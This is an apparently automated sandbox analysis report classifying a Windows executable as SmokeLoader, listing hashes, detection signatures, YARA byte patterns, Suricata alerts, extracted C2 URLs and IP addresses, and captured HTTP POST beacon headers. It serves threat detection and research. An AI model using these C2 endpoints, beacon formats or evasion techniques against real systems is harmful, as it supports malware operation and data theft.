Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
K80v6DHFHE.exe

Overview

General Information

Sample name:K80v6DHFHE.exe
renamed because original name is a hash value
Original sample name:278df1e655d9d27b659468ea21758d17.exe
Analysis ID:1532605
MD5:278df1e655d9d27b659468ea21758d17
SHA1:51d59cbc9e28708086517ea33ff07a9b2cfb3fcf
SHA256:2b727f4b529097748b5c49720bb42da02efb7758bf6870acfd4404c24b60840b
Tags:exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • K80v6DHFHE.exe (PID: 5544 cmdline: "C:\Users\user\Desktop\K80v6DHFHE.exe" MD5: 278DF1E655D9D27B659468EA21758D17)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • wafguag (PID: 6100 cmdline: C:\Users\user\AppData\Roaming\wafguag MD5: 278DF1E655D9D27B659468EA21758D17)
  • wafguag (PID: 2936 cmdline: C:\Users\user\AppData\Roaming\wafguag MD5: 278DF1E655D9D27B659468EA21758D17)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1931909855.0000000002B7D000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x313f:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1931965782.0000000002C70000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1931984278.0000000002C80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000000.00000002.1931984278.0000000002C80000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000005.00000002.2220751054.0000000002C80000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    Click to see the 7 entries

    System Summary

    barindex
    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\wafguag, CommandLine: C:\Users\user\AppData\Roaming\wafguag, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wafguag, NewProcessName: C:\Users\user\AppData\Roaming\wafguag, OriginalFileName: C:\Users\user\AppData\Roaming\wafguag, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\wafguag, ProcessId: 6100, ProcessName: wafguag
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T18:27:45.303931+020020391031A Network Trojan was detected192.168.2.464968148.230.249.980TCP
    2024-10-13T18:27:46.963293+020020391031A Network Trojan was detected192.168.2.464969148.230.249.980TCP
    2024-10-13T18:27:47.919755+020020391031A Network Trojan was detected192.168.2.464970148.230.249.980TCP
    2024-10-13T18:27:48.894639+020020391031A Network Trojan was detected192.168.2.464971148.230.249.980TCP
    2024-10-13T18:27:49.898590+020020391031A Network Trojan was detected192.168.2.464972148.230.249.980TCP
    2024-10-13T18:27:50.854819+020020391031A Network Trojan was detected192.168.2.464973148.230.249.980TCP
    2024-10-13T18:27:51.827443+020020391031A Network Trojan was detected192.168.2.464974148.230.249.980TCP
    2024-10-13T18:27:52.778261+020020391031A Network Trojan was detected192.168.2.464975148.230.249.980TCP
    2024-10-13T18:27:53.738201+020020391031A Network Trojan was detected192.168.2.464976148.230.249.980TCP
    2024-10-13T18:27:54.709329+020020391031A Network Trojan was detected192.168.2.464977148.230.249.980TCP
    2024-10-13T18:27:55.664115+020020391031A Network Trojan was detected192.168.2.464978148.230.249.980TCP
    2024-10-13T18:27:56.624121+020020391031A Network Trojan was detected192.168.2.464979148.230.249.980TCP
    2024-10-13T18:27:57.590520+020020391031A Network Trojan was detected192.168.2.464981148.230.249.980TCP
    2024-10-13T18:27:58.543210+020020391031A Network Trojan was detected192.168.2.464987148.230.249.980TCP
    2024-10-13T18:27:59.558359+020020391031A Network Trojan was detected192.168.2.464993148.230.249.980TCP
    2024-10-13T18:28:00.521490+020020391031A Network Trojan was detected192.168.2.464999148.230.249.980TCP
    2024-10-13T18:28:01.500523+020020391031A Network Trojan was detected192.168.2.465005148.230.249.980TCP
    2024-10-13T18:28:02.470685+020020391031A Network Trojan was detected192.168.2.465016148.230.249.980TCP
    2024-10-13T18:28:03.627242+020020391031A Network Trojan was detected192.168.2.465022148.230.249.980TCP
    2024-10-13T18:28:04.593154+020020391031A Network Trojan was detected192.168.2.465028148.230.249.980TCP
    2024-10-13T18:28:05.564245+020020391031A Network Trojan was detected192.168.2.465034148.230.249.980TCP
    2024-10-13T18:28:06.520404+020020391031A Network Trojan was detected192.168.2.465046148.230.249.980TCP
    2024-10-13T18:28:07.527668+020020391031A Network Trojan was detected192.168.2.465052148.230.249.980TCP
    2024-10-13T18:28:08.550643+020020391031A Network Trojan was detected192.168.2.465058148.230.249.980TCP
    2024-10-13T18:28:09.504054+020020391031A Network Trojan was detected192.168.2.465064148.230.249.980TCP
    2024-10-13T18:28:10.465258+020020391031A Network Trojan was detected192.168.2.465070148.230.249.980TCP
    2024-10-13T18:28:11.447931+020020391031A Network Trojan was detected192.168.2.465080148.230.249.980TCP
    2024-10-13T18:28:12.404007+020020391031A Network Trojan was detected192.168.2.465082148.230.249.980TCP
    2024-10-13T18:28:13.361965+020020391031A Network Trojan was detected192.168.2.465092148.230.249.980TCP
    2024-10-13T18:28:14.318728+020020391031A Network Trojan was detected192.168.2.465099148.230.249.980TCP
    2024-10-13T18:28:15.828924+020020391031A Network Trojan was detected192.168.2.465105148.230.249.980TCP
    2024-10-13T18:28:16.790815+020020391031A Network Trojan was detected192.168.2.465115148.230.249.980TCP
    2024-10-13T18:28:17.753342+020020391031A Network Trojan was detected192.168.2.465122148.230.249.980TCP
    2024-10-13T18:28:18.775757+020020391031A Network Trojan was detected192.168.2.465128148.230.249.980TCP
    2024-10-13T18:28:19.728904+020020391031A Network Trojan was detected192.168.2.465134148.230.249.980TCP
    2024-10-13T18:28:20.704701+020020391031A Network Trojan was detected192.168.2.465140148.230.249.980TCP
    2024-10-13T18:29:26.607711+020020391031A Network Trojan was detected192.168.2.465270148.230.249.980TCP
    2024-10-13T18:29:28.771259+020020391031A Network Trojan was detected192.168.2.465271148.230.249.980TCP
    2024-10-13T18:29:30.033311+020020391031A Network Trojan was detected192.168.2.465272148.230.249.980TCP
    2024-10-13T18:29:31.548788+020020391031A Network Trojan was detected192.168.2.465273148.230.249.980TCP
    2024-10-13T18:29:32.705945+020020391031A Network Trojan was detected192.168.2.465274148.230.249.980TCP
    2024-10-13T18:29:38.370062+020020391031A Network Trojan was detected192.168.2.465275148.230.249.980TCP
    2024-10-13T18:29:43.415784+020020391031A Network Trojan was detected192.168.2.465276148.230.249.980TCP
    2024-10-13T18:29:48.487284+020020391031A Network Trojan was detected192.168.2.465277148.230.249.980TCP
    2024-10-13T18:29:53.628328+020020391031A Network Trojan was detected192.168.2.465278148.230.249.980TCP
    2024-10-13T18:29:59.682273+020020391031A Network Trojan was detected192.168.2.465279148.230.249.980TCP
    2024-10-13T18:30:06.086268+020020391031A Network Trojan was detected192.168.2.465280148.230.249.980TCP
    2024-10-13T18:30:12.261434+020020391031A Network Trojan was detected192.168.2.465281148.230.249.980TCP
    2024-10-13T18:30:21.478641+020020391031A Network Trojan was detected192.168.2.465282190.156.239.4980TCP
    2024-10-13T18:30:27.201694+020020391031A Network Trojan was detected192.168.2.465283190.156.239.4980TCP
    2024-10-13T18:30:33.413089+020020391031A Network Trojan was detected192.168.2.465284190.156.239.4980TCP
    2024-10-13T18:30:39.987751+020020391031A Network Trojan was detected192.168.2.465285190.156.239.4980TCP
    2024-10-13T18:30:45.633160+020020391031A Network Trojan was detected192.168.2.465286190.156.239.4980TCP
    2024-10-13T18:30:52.041561+020020391031A Network Trojan was detected192.168.2.465287190.156.239.4980TCP
    2024-10-13T18:30:57.539699+020020391031A Network Trojan was detected192.168.2.465288190.156.239.4980TCP
    2024-10-13T18:31:04.509515+020020391031A Network Trojan was detected192.168.2.465289190.156.239.4980TCP
    2024-10-13T18:31:10.096614+020020391031A Network Trojan was detected192.168.2.465290190.156.239.4980TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: K80v6DHFHE.exeAvira: detected
    Source: C:\Users\user\AppData\Roaming\wafguagAvira: detection malicious, Label: HEUR/AGEN.1312571
    Source: 00000000.00000002.1931984278.0000000002C80000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
    Source: nwgrus.ruVirustotal: Detection: 12%Perma Link
    Source: http://nwgrus.ru/tmp/index.phpVirustotal: Detection: 16%Perma Link
    Source: C:\Users\user\AppData\Roaming\wafguagReversingLabs: Detection: 39%
    Source: C:\Users\user\AppData\Roaming\wafguagVirustotal: Detection: 41%Perma Link
    Source: K80v6DHFHE.exeReversingLabs: Detection: 39%
    Source: K80v6DHFHE.exeVirustotal: Detection: 41%Perma Link
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: C:\Users\user\AppData\Roaming\wafguagJoe Sandbox ML: detected
    Source: K80v6DHFHE.exeJoe Sandbox ML: detected
    Source: K80v6DHFHE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64987 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64969 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64968 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64971 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64978 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64981 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65022 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64993 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64970 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65005 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64975 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64976 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64973 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65016 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65058 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65046 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65028 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64977 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65080 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65082 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64974 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65092 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65099 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65064 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64999 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65122 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64979 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65128 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65115 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65034 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65134 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64972 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65070 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65052 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65140 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65105 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65271 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65270 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65272 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65274 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65277 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65275 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65283 -> 190.156.239.49:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65282 -> 190.156.239.49:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65281 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65276 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65273 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65279 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65285 -> 190.156.239.49:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65290 -> 190.156.239.49:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65287 -> 190.156.239.49:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65288 -> 190.156.239.49:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65278 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65284 -> 190.156.239.49:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65280 -> 148.230.249.9:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65289 -> 190.156.239.49:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65286 -> 190.156.239.49:80
    Source: C:\Windows\explorer.exeNetwork Connect: 190.156.239.49 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 148.230.249.9 80Jump to behavior
    Source: Malware configuration extractorURLs: http://nwgrus.ru/tmp/index.php
    Source: Malware configuration extractorURLs: http://tech-servers.in.net/tmp/index.php
    Source: Malware configuration extractorURLs: http://unicea.ws/tmp/index.php
    Source: Joe Sandbox ViewIP Address: 190.156.239.49 190.156.239.49
    Source: Joe Sandbox ViewIP Address: 148.230.249.9 148.230.249.9
    Source: Joe Sandbox ViewASN Name: TelmexColombiaSACO TelmexColombiaSACO
    Source: Joe Sandbox ViewASN Name: LVLT-3549US LVLT-3549US
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oiwjgaljhmhwar.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://upppthvngavhg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xbxjiiplcauibu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uowfkuajgbrsxf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bsujqjcrhguj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://akxpcpdhnwlcvewi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yvuudhqxndfwr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fgueognrgcdryprb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hvywquxnrrbp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cacpihwweubtsxg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rqcdsrhbxdj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://llagbnlopmmumxog.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kdhqngbaswv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ttjnxnssovi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mxvsopepyhexw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://icsnyxejpjswt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ofymhpccvbs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bysfflokkqfepm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jktwhgejoiledxll.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dixscrvatda.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mjtbwlnoxuan.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sndnvyniffwfhh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vedtfnbjotxnqis.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: nwgrus.ru
